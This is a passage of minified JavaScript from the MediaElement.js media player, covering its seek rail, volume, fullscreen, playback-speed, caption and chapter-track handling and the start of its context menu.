Slider"),f=mejs.Utility.secondsToTimeCode(c,b.options),g=e.duration;m.attr({"aria-label":d,"aria-valuemin":0,"aria-valuemax":g,"aria-valuenow":c,"aria-valuetext":f,role:"slider",tabindex:0})},u=function(){var a=new Date;a-q>=1e3&&e.play()};m.bind("focus",function(a){b.options.autoRewind=!1}),m.bind("blur",function(a){b.options.autoRewind=s}),m.bind("keydown",function(a){new Date-q>=1e3&&(r=e.paused);var c=a.keyCode,d=e.duration,f=e.currentTime,g=b.options.defaultSeekForwardInterval(d),h=b.options.defaultSeekBackwardInterval(d);switch(c){case 37:case 40:f-=h;break;case 39:case 38:f+=g;break;case 36:f=0;break;case 35:f=d;break;case 32:case 13:return void(e.paused?e.play():e.pause());default:return}return f=0>f?0:f>=d?d:Math.floor(f),q=new Date,r||e.pause(),f<e.duration&&!r&&setTimeout(u,1100),e.setCurrentTime(f),a.preventDefault(),a.stopPropagation(),!1}),g.bind("mousedown touchstart",function(a){(1===a.which||0===a.which)&&(o=!0,n(a),f.globalBind("mousemove.dur touchmove.dur",function(a){n(a)}),f.globalBind("mouseup.dur touchend.dur",function(a){o=!1,k.hide(),f.globalUnbind(".dur")}))}).bind("mouseenter",function(a){p=!0,f.globalBind("mousemove.dur",function(a){n(a)}),mejs.MediaFeatures.hasTouch||k.show()}).bind("mouseleave",function(a){p=!1,o||(f.globalUnbind(".dur"),k.hide())}),e.addEventListener("progress",function(a){b.setProgressRail(a),b.setCurrentRail(a)},!1),e.addEventListener("timeupdate",function(a){b.setProgressRail(a),b.setCurrentRail(a),t(a)},!1),f.container.on("controlsresize",function(){b.setProgressRail(),b.setCurrentRail()}),f.loaded=h,f.total=g,f.current=i,f.handle=j},setProgressRail:function(a){var b=this,c=void 0!==a?a.target:b.media,d=null;c&&c.buffered&&c.buffered.length>0&&c.buffered.end&&c.duration?d=c.buffered.end(c.buffered.length-1)/c.duration:c&&void 0!==c.bytesTotal&&c.bytesTotal>0&&void 0!==c.bufferedBytes?d=c.bufferedBytes/c.bytesTotal:a&&a.lengthComputable&&0!==a.total&&(d=a.loaded/a.total),null!==d&&(d=Math.min(1,Math.max(0,d)),b.loaded&&b.total&&b.loaded.width(b.total.width()*d))},setCurrentRail:function(){var a=this;if(void 0!==a.media.currentTime&&a.media.duration&&a.total&&a.handle){var b=Math.round(a.total.width()*a.media.currentTime/a.media.duration),c=b-Math.round(a.handle.outerWidth(!0)/2);a.current.width(b),a.handle.css("left",c)}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{duration:-1,timeAndDurationSeparator:"<span> | </span>"}),a.extend(MediaElementPlayer.prototype,{buildcurrent:function(b,c,d,e){var f=this;a('<div class="mejs-time" role="timer" aria-live="off"><span class="mejs-currenttime">'+mejs.Utility.secondsToTimeCode(0,b.options)+"</span></div>").appendTo(c),f.currenttime=f.controls.find(".mejs-currenttime"),e.addEventListener("timeupdate",function(){b.updateCurrent()},!1)},buildduration:function(b,c,d,e){var f=this;c.children().last().find(".mejs-currenttime").length>0?a(f.options.timeAndDurationSeparator+'<span class="mejs-duration">'+mejs.Utility.secondsToTimeCode(f.options.duration,f.options)+"</span>").appendTo(c.find(".mejs-time")):(c.find(".mejs-currenttime").parent().addClass("mejs-currenttime-container"),a('<div class="mejs-time mejs-duration-container"><span class="mejs-duration">'+mejs.Utility.secondsToTimeCode(f.options.duration,f.options)+"</span></div>").appendTo(c)),f.durationD=f.controls.find(".mejs-duration"),e.addEventListener("timeupdate",function(){b.updateDuration()},!1)},updateCurrent:function(){var a=this,b=a.media.currentTime;isNaN(b)&&(b=0),a.currenttime&&a.currenttime.html(mejs.Utility.secondsToTimeCode(b,a.options))},updateDuration:function(){var a=this,b=a.media.duration;a.options.duration>0&&(b=a.options.duration),isNaN(b)&&(b=0),a.container.toggleClass("mejs-long-video",b>3600),a.durationD&&b>0&&a.durationD.html(mejs.Utility.secondsToTimeCode(b,a.options))}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{muteText:mejs.i18n.t("Mute Toggle"),allyVolumeControlText:mejs.i18n.t("Use Up/Down Arrow keys to increase or decrease volume."),hideVolumeOnTouchDevices:!0,audioVolume:"horizontal",videoVolume:"vertical"}),a.extend(MediaElementPlayer.prototype,{buildvolume:function(b,c,d,e){if(!mejs.MediaFeatures.isAndroid&&!mejs.MediaFeatures.isiOS||!this.options.hideVolumeOnTouchDevices){var f=this,g=f.isVideo?f.options.videoVolume:f.options.audioVolume,h="horizontal"==g?a('<div class="mejs-button mejs-volume-button mejs-mute"><button type="button" aria-controls="'+f.id+'" title="'+f.options.muteText+'" aria-label="'+f.options.muteText+'"></button></div><a href="javascript:void(0);" class="mejs-horizontal-volume-slider"><span class="mejs-offscreen">'+f.options.allyVolumeControlText+'</span><div class="mejs-horizontal-volume-total"></div><div class="mejs-horizontal-volume-current"></div><div class="mejs-horizontal-volume-handle"></div></a>').appendTo(c):a('<div class="mejs-button mejs-volume-button mejs-mute"><button type="button" aria-controls="'+f.id+'" title="'+f.options.muteText+'" aria-label="'+f.options.muteText+'"></button><a href="javascript:void(0);" class="mejs-volume-slider"><span class="mejs-offscreen">'+f.options.allyVolumeControlText+'</span><div class="mejs-volume-total"></div><div class="mejs-volume-current"></div><div class="mejs-volume-handle"></div></a></div>').appendTo(c),i=f.container.find(".mejs-volume-slider, .mejs-horizontal-volume-slider"),j=f.container.find(".mejs-volume-total, .mejs-horizontal-volume-total"),k=f.container.find(".mejs-volume-current, .mejs-horizontal-volume-current"),l=f.container.find(".mejs-volume-handle, .mejs-horizontal-volume-handle"),m=function(a,b){if(!i.is(":visible")&&"undefined"==typeof b)return i.show(),m(a,!0),void i.hide();a=Math.max(0,a),a=Math.min(a,1),0===a?(h.removeClass("mejs-mute").addClass("mejs-unmute"),h.children("button").attr("title",mejs.i18n.t("Unmute")).attr("aria-label",mejs.i18n.t("Unmute"))):(h.removeClass("mejs-unmute").addClass("mejs-mute"),h.children("button").attr("title",mejs.i18n.t("Mute")).attr("aria-label",mejs.i18n.t("Mute")));var c=j.position();if("vertical"==g){var d=j.height(),e=d-d*a;l.css("top",Math.round(c.top+e-l.height()/2)),k.height(d-e),k.css("top",c.top+e)}else{var f=j.width(),n=f*a;l.css("left",Math.round(c.left+n-l.width()/2)),k.width(Math.round(n))}},n=function(a){var b=null,c=j.offset();if("vertical"===g){var d=j.height(),f=a.pageY-c.top;if(b=(d-f)/d,0===c.top||0===c.left)return}else{var h=j.width(),i=a.pageX-c.left;b=i/h}b=Math.max(0,b),b=Math.min(b,1),m(b),0===b?e.setMuted(!0):e.setMuted(!1),e.setVolume(b)},o=!1,p=!1;h.hover(function(){i.show(),p=!0},function(){p=!1,o||"vertical"!=g||i.hide()});var q=function(a){var b=Math.floor(100*e.volume);i.attr({"aria-label":mejs.i18n.t("Volume Slider"),"aria-valuemin":0,"aria-valuemax":100,"aria-valuenow":b,"aria-valuetext":b+"%",role:"slider",tabindex:0})};i.bind("mouseover",function(){p=!0}).bind("mousedown",function(a){return n(a),f.globalBind("mousemove.vol",function(a){n(a)}),f.globalBind("mouseup.vol",function(){o=!1,f.globalUnbind(".vol"),p||"vertical"!=g||i.hide()}),o=!0,!1}).bind("keydown",function(a){var b=a.keyCode,c=e.volume;switch(b){case 38:c=Math.min(c+.1,1);break;case 40:c=Math.max(0,c-.1);break;default:return!0}return o=!1,m(c),e.setVolume(c),!1}),h.find("button").click(function(){e.setMuted(!e.muted)}),h.find("button").bind("focus",function(){i.show()}),e.addEventListener("volumechange",function(a){o||(e.muted?(m(0),h.removeClass("mejs-mute").addClass("mejs-unmute")):(m(e.volume),h.removeClass("mejs-unmute").addClass("mejs-mute"))),q(a)},!1),0===b.options.startVolume&&e.setMuted(!0),"native"===e.pluginType&&e.setVolume(b.options.startVolume),f.container.on("controlsresize",function(){m(e.volume)})}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{usePluginFullScreen:!0,newWindowCallback:function(){return""},fullscreenText:mejs.i18n.t("Fullscreen")}),a.extend(MediaElementPlayer.prototype,{isFullScreen:!1,isNativeFullScreen:!1,isInIframe:!1,fullscreenMode:"",buildfullscreen:function(b,c,d,e){if(b.isVideo){b.isInIframe=window.location!=window.parent.location,e.addEventListener("play",function(){b.detectFullscreenMode()});var f=this,g=null,h=a('<div class="mejs-button mejs-fullscreen-button"><button type="button" aria-controls="'+f.id+'" title="'+f.options.fullscreenText+'" aria-label="'+f.options.fullscreenText+'"></button></div>').appendTo(c).on("click",function(){var a=mejs.MediaFeatures.hasTrueNativeFullScreen&&mejs.MediaFeatures.isFullScreen()||b.isFullScreen;a?b.exitFullScreen():b.enterFullScreen()}).on("mouseover",function(){if("plugin-hover"==f.fullscreenMode){null!==g&&(clearTimeout(g),delete g);var a=h.offset(),c=b.container.offset();e.positionFullscreenButton(a.left-c.left,a.top-c.top,!0)}}).on("mouseout",function(){"plugin-hover"==f.fullscreenMode&&(null!==g&&(clearTimeout(g),delete g),g=setTimeout(function(){e.hideFullscreenButton()},1500))});if(b.fullscreenBtn=h,f.globalBind("keydown",function(a){27==a.keyCode&&(mejs.MediaFeatures.hasTrueNativeFullScreen&&mejs.MediaFeatures.isFullScreen()||f.isFullScreen)&&b.exitFullScreen()}),f.normalHeight=0,f.normalWidth=0,mejs.MediaFeatures.hasTrueNativeFullScreen){var i=function(a){b.isFullScreen&&(mejs.MediaFeatures.isFullScreen()?(b.isNativeFullScreen=!0,b.setControlsSize()):(b.isNativeFullScreen=!1,b.exitFullScreen()))};b.globalBind(mejs.MediaFeatures.fullScreenEventName,i)}}},detectFullscreenMode:function(){var a=this,b="",c=mejs.MediaFeatures;return c.hasTrueNativeFullScreen&&"native"===a.media.pluginType?b="native-native":c.hasTrueNativeFullScreen&&"native"!==a.media.pluginType&&!c.hasFirefoxPluginMovingProblem?b="plugin-native":a.usePluginFullScreen?mejs.MediaFeatures.supportsPointerEvents?(b="plugin-click",a.createPluginClickThrough()):b="plugin-hover":b="fullwindow",a.fullscreenMode=b,b},isPluginClickThroughCreated:!1,createPluginClickThrough:function(){var b=this;if(!b.isPluginClickThroughCreated){var c,d,e=!1,f=function(){if(e){for(var a in g)g[a].hide();b.fullscreenBtn.css("pointer-events",""),b.controls.css("pointer-events",""),b.media.removeEventListener("click",b.clickToPlayPauseCallback),e=!1}},g={},h=["top","left","right","bottom"],i=function(){var a=fullscreenBtn.offset().left-b.container.offset().left,d=fullscreenBtn.offset().top-b.container.offset().top,e=fullscreenBtn.outerWidth(!0),f=fullscreenBtn.outerHeight(!0),h=b.container.width(),i=b.container.height();for(c in g)g[c].css({position:"absolute",top:0,left:0});g.top.width(h).height(d),g.left.width(a).height(f).css({top:d}),g.right.width(h-a-e).height(f).css({top:d,left:a+e}),g.bottom.width(h).height(i-f-d).css({top:d+f})};for(b.globalBind("resize",function(){i()}),c=0,d=h.length;d>c;c++)g[h[c]]=a('<div class="mejs-fullscreen-hover" />').appendTo(b.container).mouseover(f).hide();fullscreenBtn.on("mouseover",function(){if(!b.isFullScreen){var a=fullscreenBtn.offset(),d=player.container.offset();media.positionFullscreenButton(a.left-d.left,a.top-d.top,!1),b.fullscreenBtn.css("pointer-events","none"),b.controls.css("pointer-events","none"),b.media.addEventListener("click",b.clickToPlayPauseCallback);for(c in g)g[c].show();i(),e=!0}}),media.addEventListener("fullscreenchange",function(a){b.isFullScreen=!b.isFullScreen,b.isFullScreen?b.media.removeEventListener("click",b.clickToPlayPauseCallback):b.media.addEventListener("click",b.clickToPlayPauseCallback),f()}),b.globalBind("mousemove",function(a){if(e){var c=fullscreenBtn.offset();(a.pageY<c.top||a.pageY>c.top+fullscreenBtn.outerHeight(!0)||a.pageX<c.left||a.pageX>c.left+fullscreenBtn.outerWidth(!0))&&(fullscreenBtn.css("pointer-events",""),b.controls.css("pointer-events",""),e=!1)}}),b.isPluginClickThroughCreated=!0}},cleanfullscreen:function(a){a.exitFullScreen()},containerSizeTimeout:null,enterFullScreen:function(){var b=this;return mejs.MediaFeatures.hasiOSFullScreen?void b.media.webkitEnterFullscreen():(a(document.documentElement).addClass("mejs-fullscreen"),b.normalHeight=b.container.height(),b.normalWidth=b.container.width(),"native-native"===b.fullscreenMode||"plugin-native"===b.fullscreenMode?(mejs.MediaFeatures.requestFullScreen(b.container[0]),b.isInIframe&&setTimeout(function c(){if(b.isNativeFullScreen){var d=.002,e=a(window).width(),f=screen.width,g=Math.abs(f-e),h=f*d;g>h?b.exitFullScreen():setTimeout(c,500)}},1e3)):"fullwindow"==b.fullscreeMode,b.container.addClass("mejs-container-fullscreen").width("100%").height("100%"),b.containerSizeTimeout=setTimeout(function(){b.container.css({width:"100%",height:"100%"}),b.setControlsSize()},500),"native"===b.media.pluginType?b.$media.width("100%").height("100%"):(b.container.find(".mejs-shim").width("100%").height("100%"),setTimeout(function(){var c=a(window),d=c.width(),e=c.height();b.media.setVideoSize(d,e)},500)),b.layers.children("div").width("100%").height("100%"),b.fullscreenBtn&&b.fullscreenBtn.removeClass("mejs-fullscreen").addClass("mejs-unfullscreen"),b.setControlsSize(),b.isFullScreen=!0,b.container.find(".mejs-captions-text").css("font-size",screen.width/b.width*1*100+"%"),b.container.find(".mejs-captions-position").css("bottom","45px"),void b.container.trigger("enteredfullscreen"))},exitFullScreen:function(){var b=this;clearTimeout(b.containerSizeTimeout),mejs.MediaFeatures.hasTrueNativeFullScreen&&(mejs.MediaFeatures.isFullScreen()||b.isFullScreen)&&mejs.MediaFeatures.cancelFullScreen(),a(document.documentElement).removeClass("mejs-fullscreen"),b.container.removeClass("mejs-container-fullscreen").width(b.normalWidth).height(b.normalHeight),"native"===b.media.pluginType?b.$media.width(b.normalWidth).height(b.normalHeight):(b.container.find(".mejs-shim").width(b.normalWidth).height(b.normalHeight),b.media.setVideoSize(b.normalWidth,b.normalHeight)),b.layers.children("div").width(b.normalWidth).height(b.normalHeight),b.fullscreenBtn.removeClass("mejs-unfullscreen").addClass("mejs-fullscreen"),b.setControlsSize(),b.isFullScreen=!1,b.container.find(".mejs-captions-text").css("font-size",""),b.container.find(".mejs-captions-position").css("bottom",""),b.container.trigger("exitedfullscreen")}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{speeds:["2.00","1.50","1.25","1.00","0.75"],defaultSpeed:"1.00",speedChar:"x"}),a.extend(MediaElementPlayer.prototype,{buildspeed:function(b,c,d,e){var f=this;if("native"==f.media.pluginType){for(var g=null,h=null,i=null,j=null,k=[],l=!1,m=0,n=f.options.speeds.length;n>m;m++){var o=f.options.speeds[m];"string"==typeof o?(k.push({name:o+f.options.speedChar,value:o}),o===f.options.defaultSpeed&&(l=!0)):(k.push(o),o.value===f.options.defaultSpeed&&(l=!0))}l||k.push({name:f.options.defaultSpeed+f.options.speedChar,value:f.options.defaultSpeed}),k.sort(function(a,b){return parseFloat(b.value)-parseFloat(a.value)});var p=function(a){for(m=0,n=k.length;n>m;m++)if(k[m].value===a)return k[m].name},q='<div class="mejs-button mejs-speed-button"><button type="button">'+p(f.options.defaultSpeed)+'</button><div class="mejs-speed-selector"><ul>';for(m=0,il=k.length;m<il;m++)j=f.id+"-speed-"+k[m].value,q+='<li><input type="radio" name="speed" value="'+k[m].value+'" id="'+j+'" '+(k[m].value===f.options.defaultSpeed?" checked":"")+' /><label for="'+j+'" '+(k[m].value===f.options.defaultSpeed?' class="mejs-speed-selected"':"")+">"+k[m].name+"</label></li>";q+="</ul></div></div>",g=a(q).appendTo(c),h=g.find(".mejs-speed-selector"),i=f.options.defaultSpeed,e.addEventListener("loadedmetadata",function(a){i&&(e.playbackRate=parseFloat(i))},!0),h.on("click",'input[type="radio"]',function(){var b=a(this).attr("value");i=b,e.playbackRate=parseFloat(b),g.find("button").html(p(b)),g.find(".mejs-speed-selected").removeClass("mejs-speed-selected"),g.find('input[type="radio"]:checked').next().addClass("mejs-speed-selected")}),g.one("mouseenter focusin",function(){h.height(g.find(".mejs-speed-selector ul").outerHeight(!0)+g.find(".mejs-speed-translations").outerHeight(!0)).css("top",-1*h.height()+"px")})}}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{startLanguage:"",tracksText:mejs.i18n.t("Captions/Subtitles"),tracksAriaLive:!1,hideCaptionsButtonWhenEmpty:!0,toggleCaptionsButtonWhenOnlyOne:!1,slidesSelector:""}),a.extend(MediaElementPlayer.prototype,{hasChapters:!1,cleartracks:function(a,b,c,d){a&&(a.captions&&a.captions.remove(),a.chapters&&a.chapters.remove(),a.captionsText&&a.captionsText.remove(),a.captionsButton&&a.captionsButton.remove())},buildtracks:function(b,c,d,e){if(0!==b.tracks.length){var f,g=this,h=g.options.tracksAriaLive?'role="log" aria-live="assertive" aria-atomic="false"':"";if(g.domNode.textTracks)for(f=g.domNode.textTracks.length-1;f>=0;f--)g.domNode.textTracks[f].mode="hidden";g.cleartracks(b,c,d,e),b.chapters=a('<div class="mejs-chapters mejs-layer"></div>').prependTo(d).hide(),b.captions=a('<div class="mejs-captions-layer mejs-layer"><div class="mejs-captions-position mejs-captions-position-hover" '+h+'><span class="mejs-captions-text"></span></div></div>').prependTo(d).hide(),b.captionsText=b.captions.find(".mejs-captions-text"),b.captionsButton=a('<div class="mejs-button mejs-captions-button"><button type="button" aria-controls="'+g.id+'" title="'+g.options.tracksText+'" aria-label="'+g.options.tracksText+'"></button><div class="mejs-captions-selector"><ul><li><input type="radio" name="'+b.id+'_captions" id="'+b.id+'_captions_none" value="none" checked="checked" /><label for="'+b.id+'_captions_none">'+mejs.i18n.t("None")+"</label></li></ul></div></div>").appendTo(c);var i=0;for(f=0;f<b.tracks.length;f++)"subtitles"==b.tracks[f].kind&&i++;for(g.options.toggleCaptionsButtonWhenOnlyOne&&1==i?b.captionsButton.on("click",function(){null===b.selectedTrack?lang=b.tracks[0].srclang:lang="none",b.setTrack(lang)}):(b.captionsButton.on("mouseenter focusin",function(){a(this).find(".mejs-captions-selector").removeClass("mejs-offscreen")}).on("click","input[type=radio]",function(){lang=this.value,b.setTrack(lang)}),b.captionsButton.on("mouseleave focusout",function(){a(this).find(".mejs-captions-selector").addClass("mejs-offscreen")})),b.options.alwaysShowControls?b.container.find(".mejs-captions-position").addClass("mejs-captions-position-hover"):b.container.bind("controlsshown",function(){b.container.find(".mejs-captions-position").addClass("mejs-captions-position-hover")}).bind("controlshidden",function(){e.paused||b.container.find(".mejs-captions-position").removeClass("mejs-captions-position-hover")}),b.trackToLoad=-1,b.selectedTrack=null,b.isLoadingTrack=!1,f=0;f<b.tracks.length;f++)"subtitles"==b.tracks[f].kind&&b.addTrackButton(b.tracks[f].srclang,b.tracks[f].label);b.loadNextTrack(),e.addEventListener("timeupdate",function(a){b.displayCaptions()},!1),""!==b.options.slidesSelector&&(b.slidesContainer=a(b.options.slidesSelector),e.addEventListener("timeupdate",function(a){b.displaySlides()},!1)),e.addEventListener("loadedmetadata",function(a){b.displayChapters()},!1),b.container.hover(function(){b.hasChapters&&(b.chapters.removeClass("mejs-offscreen"),b.chapters.fadeIn(200).height(b.chapters.find(".mejs-chapter").outerHeight()))},function(){b.hasChapters&&!e.paused&&b.chapters.fadeOut(200,function(){a(this).addClass("mejs-offscreen"),a(this).css("display","block")})}),g.container.on("controlsresize",function(){g.adjustLanguageBox()}),null!==b.node.getAttribute("autoplay")&&b.chapters.addClass("mejs-offscreen")}},setTrack:function(a){var b,c=this;if("none"==a)c.selectedTrack=null,c.captionsButton.removeClass("mejs-captions-enabled");else for(b=0;b<c.tracks.length;b++)if(c.tracks[b].srclang==a){null===c.selectedTrack&&c.captionsButton.addClass("mejs-captions-enabled"),c.selectedTrack=c.tracks[b],c.captions.attr("lang",c.selectedTrack.srclang),c.displayCaptions();break}},loadNextTrack:function(){var a=this;a.trackToLoad++,a.trackToLoad<a.tracks.length?(a.isLoadingTrack=!0,a.loadTrack(a.trackToLoad)):(a.isLoadingTrack=!1,a.checkForTracks())},loadTrack:function(b){var c=this,d=c.tracks[b],e=function(){d.isLoaded=!0,c.enableTrackButton(d.srclang,d.label),c.loadNextTrack()};a.ajax({url:d.src,dataType:"text",success:function(a){"string"==typeof a&&/<tt\s+xml/gi.exec(a)?d.entries=mejs.TrackFormatParser.dfxp.parse(a):d.entries=mejs.TrackFormatParser.webvtt.parse(a),e(),"chapters"==d.kind&&c.media.addEventListener("play",function(a){c.media.duration>0&&c.displayChapters(d)},!1),"slides"==d.kind&&c.setupSlides(d)},error:function(){c.removeTrackButton(d.srclang),c.loadNextTrack()}})},enableTrackButton:function(b,c){var d=this;""===c&&(c=mejs.language.codes[b]||b),d.captionsButton.find("input[value="+b+"]").prop("disabled",!1).siblings("label").html(c),d.options.startLanguage==b&&a("#"+d.id+"_captions_"+b).prop("checked",!0).trigger("click"),d.adjustLanguageBox()},removeTrackButton:function(a){var b=this;b.captionsButton.find("input[value="+a+"]").closest("li").remove(),b.adjustLanguageBox()},addTrackButton:function(b,c){var d=this;""===c&&(c=mejs.language.codes[b]||b),d.captionsButton.find("ul").append(a('<li><input type="radio" name="'+d.id+'_captions" id="'+d.id+"_captions_"+b+'" value="'+b+'" disabled="disabled" /><label for="'+d.id+"_captions_"+b+'">'+c+" (loading)</label></li>")),d.adjustLanguageBox(),d.container.find(".mejs-captions-translations option[value="+b+"]").remove()},adjustLanguageBox:function(){var a=this;a.captionsButton.find(".mejs-captions-selector").height(a.captionsButton.find(".mejs-captions-selector ul").outerHeight(!0)+a.captionsButton.find(".mejs-captions-translations").outerHeight(!0))},checkForTracks:function(){var a=this,b=!1;if(a.options.hideCaptionsButtonWhenEmpty){for(i=0;i<a.tracks.length;i++)if("subtitles"==a.tracks[i].kind&&a.tracks[i].isLoaded){b=!0;break}b||(a.captionsButton.hide(),a.setControlsSize())}},displayCaptions:function(){if("undefined"!=typeof this.tracks){var a,b=this,c=b.selectedTrack;if(null!==c&&c.isLoaded){for(a=0;a<c.entries.times.length;a++)if(b.media.currentTime>=c.entries.times[a].start&&b.media.currentTime<=c.entries.times[a].stop)return b.captionsText.html(c.entries.text[a]).attr("class","mejs-captions-text "+(c.entries.times[a].identifier||"")),void b.captions.show().height(0);b.captions.hide()}else b.captions.hide()}},setupSlides:function(a){var b=this;b.slides=a,b.slides.entries.imgs=[b.slides.entries.text.length],b.showSlide(0)},showSlide:function(b){if("undefined"!=typeof this.tracks&&"undefined"!=typeof this.slidesContainer){var c=this,d=c.slides.entries.text[b],e=c.slides.entries.imgs[b];"undefined"==typeof e||"undefined"==typeof e.fadeIn?c.slides.entries.imgs[b]=e=a('<img src="'+d+'">').on("load",function(){e.appendTo(c.slidesContainer).hide().fadeIn().siblings(":visible").fadeOut()}):e.is(":visible")||e.is(":animated")||e.fadeIn().siblings(":visible").fadeOut()}},displaySlides:function(){if("undefined"!=typeof this.slides){var a,b=this,c=b.slides;for(a=0;a<c.entries.times.length;a++)if(b.media.currentTime>=c.entries.times[a].start&&b.media.currentTime<=c.entries.times[a].stop)return void b.showSlide(a)}},displayChapters:function(){var a,b=this;for(a=0;a<b.tracks.length;a++)if("chapters"==b.tracks[a].kind&&b.tracks[a].isLoaded){b.drawChapters(b.tracks[a]),b.hasChapters=!0;break}},drawChapters:function(b){var c,d,e=this,f=0,g=0;for(e.chapters.empty(),c=0;c<b.entries.times.length;c++)d=b.entries.times[c].stop-b.entries.times[c].start,f=Math.floor(d/e.media.duration*100),(f+g>100||c==b.entries.times.length-1&&100>f+g)&&(f=100-g),e.chapters.append(a('<div class="mejs-chapter" rel="'+b.entries.times[c].start+'" style="left: '+g.toString()+"%;width: "+f.toString()+'%;"><div class="mejs-chapter-block'+(c==b.entries.times.length-1?" mejs-chapter-block-last":"")+'"><span class="ch-title">'+b.entries.text[c]+'</span><span class="ch-time">'+mejs.Utility.secondsToTimeCode(b.entries.times[c].start,e.options)+"&ndash;"+mejs.Utility.secondsToTimeCode(b.entries.times[c].stop,e.options)+"</span></div></div>")),g+=f;e.chapters.find("div.mejs-chapter").click(function(){e.media.setCurrentTime(parseFloat(a(this).attr("rel"))),e.media.paused&&e.media.play()}),e.chapters.show()}}),mejs.language={codes:{af:"Afrikaans",sq:"Albanian",ar:"Arabic",be:"Belarusian",bg:"Bulgarian",ca:"Catalan",zh:"Chinese","zh-cn":"Chinese Simplified","zh-tw":"Chinese Traditional",hr:"Croatian",cs:"Czech",da:"Danish",nl:"Dutch",en:"English",et:"Estonian",fl:"Filipino",fi:"Finnish",fr:"French",gl:"Galician",de:"German",el:"Greek",ht:"Haitian Creole",iw:"Hebrew",hi:"Hindi",hu:"Hungarian",is:"Icelandic",id:"Indonesian",ga:"Irish",it:"Italian",ja:"Japanese",ko:"Korean",lv:"Latvian",lt:"Lithuanian",mk:"Macedonian",ms:"Malay",mt:"Maltese",no:"Norwegian",fa:"Persian",pl:"Polish",pt:"Portuguese",ro:"Romanian",ru:"Russian",sr:"Serbian",sk:"Slovak",sl:"Slovenian",es:"Spanish",sw:"Swahili",sv:"Swedish",tl:"Tagalog",th:"Thai",tr:"Turkish",uk:"Ukrainian",vi:"Vietnamese",cy:"Welsh",yi:"Yiddish"}},mejs.TrackFormatParser={webvtt:{pattern_timecode:/^((?:[0-9]{1,2}:)?[0-9]{2}:[0-9]{2}([,.][0-9]{1,3})?) --\> ((?:[0-9]{1,2}:)?[0-9]{2}:[0-9]{2}([,.][0-9]{3})?)(.*)$/,parse:function(b){for(var c,d,e,f=0,g=mejs.TrackFormatParser.split2(b,/\r?\n/),h={text:[],times:[]};f<g.length;f++){if(c=this.pattern_timecode.exec(g[f]),c&&f<g.length){for(f-1>=0&&""!==g[f-1]&&(e=g[f-1]),f++,d=g[f],f++;""!==g[f]&&f<g.length;)d=d+"\n"+g[f],f++;d=a.trim(d).replace(/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/gi,"<a href='$1' target='_blank'>$1</a>"),h.text.push(d),h.times.push({identifier:e,start:0===mejs.Utility.convertSMPTEtoSeconds(c[1])?.2:mejs.Utility.convertSMPTEtoSeconds(c[1]),stop:mejs.Utility.convertSMPTEtoSeconds(c[3]),settings:c[5]})}e=""}return h}},dfxp:{parse:function(b){b=a(b).filter("tt");var c,d,e=0,f=b.children("div").eq(0),g=f.find("p"),h=b.find("#"+f.attr("style")),i={text:[],times:[]};if(h.length){var j=h.removeAttr("id").get(0).attributes;if(j.length)for(c={},e=0;e<j.length;e++)c[j[e].name.split(":")[1]]=j[e].value}for(e=0;e<g.length;e++){var k,l={start:null,stop:null,style:null};if(g.eq(e).attr("begin")&&(l.start=mejs.Utility.convertSMPTEtoSeconds(g.eq(e).attr("begin"))),!l.start&&g.eq(e-1).attr("end")&&(l.start=mejs.Utility.convertSMPTEtoSeconds(g.eq(e-1).attr("end"))),g.eq(e).attr("end")&&(l.stop=mejs.Utility.convertSMPTEtoSeconds(g.eq(e).attr("end"))),!l.stop&&g.eq(e+1).attr("begin")&&(l.stop=mejs.Utility.convertSMPTEtoSeconds(g.eq(e+1).attr("begin"))),c){k="";for(var m in c)k+=m+":"+c[m]+";"}k&&(l.style=k),0===l.start&&(l.start=.2),i.times.push(l),d=a.trim(g.eq(e).html()).replace(/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/gi,"<a href='$1' target='_blank'>$1</a>"),i.text.push(d),0===i.times.start&&(i.times.start=2)}return i}},split2:function(a,b){return a.split(b)}},3!="x\n\ny".split(/\n/gi).length&&(mejs.TrackFormatParser.split2=function(a,b){var c,d=[],e="";for(c=0;c<a.length;c++)e+=a.substring(c,c+1),b.test(e)&&(d.push(e.replace(b,"")),e="");return d.push(e),d})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{contextMenuItems:[{render:function(a){return"undefined"==typeof a.enterFullScreen?null:a.isFullScreen?mejs.i18n.t("Turn off Fullscreen"):mejs.i18n.t("Go Fullscreen")},click:function(a){a.isFullScreen?a.exitFullScreen():a.enterFullScreen()}},{render:function(a){return a.media.muted?mejs.i18n.t("Unmute"):mejs.i18n.t("Mute")},click:function(a){a.media.muted?a.setMuted(!1):a.setMuted(!0)}},{isSeparator:!0},{render:function(a){return mejs.i18n.t("Download Video")},click:function(a){window.location.href=a.media.currentSrc}}]}),a.extend(MediaElementPlayer.prototype,{buildcontextmenu:function(b,c,d,e){b.contextMenu=a('<div class="mejs-contextmenu"></div>').appendTo(a("body")).hide(),b.container.bind("contextmenu",function(a){return b.isContextMenuEnabled?(a.preventDefault(),b.renderContextMenu(a.clientX-1,a.clientY-1),!1):void 0}),b.container.bind("click",function(){b.contextMenu.hide()}),b.contextMenu.bind("mouseleave",function(){b.startContextMenuTimer()})},cleancontextmenu:function(a){a.contextMenu.remove()},isContextMenuEnabled:!0,enableContextMenu:function(){this.isContextMenuEnabled=!0},disableContextMenu:function(){this.isContextMenuEnabled=!1},contextMenuTimeout:null,startContextMenuTimer:function(){var a=this;a.killContextMenuTimer(),a.contextMenuTimer=setTimeout(function(){a.hideContextMenu(),a.killContextMenuTimer()},750)},killContextMenuTimer:function(){var a=this.contextMenuTimer;null!=a&&(clearTimeout(a),delete a,a=null)},hideContextMenu:function(){this.contextMenu.hide()},renderContextMenu:function(b,c){for(var d=this,e="",f=d.options.contextMenuItems,g=0,h=f.length;h>g;g++)if(f[g].isSeparator)e+='<div class="mejs-contextmenu-separator"></div>';else{var i=f[g].render(d);null!=i&&(e+='<div class="mejs-contextmenu-item" data-itemindex="'+g+'" id="element-'+1e6*Math.random()+'">'+i+"</div>")}d.contextMenu.empty().append(a(e)).css({top:c,left:b}).show(),d.contextMenu.find(".mejs-contextmenu-item").each(function(){var 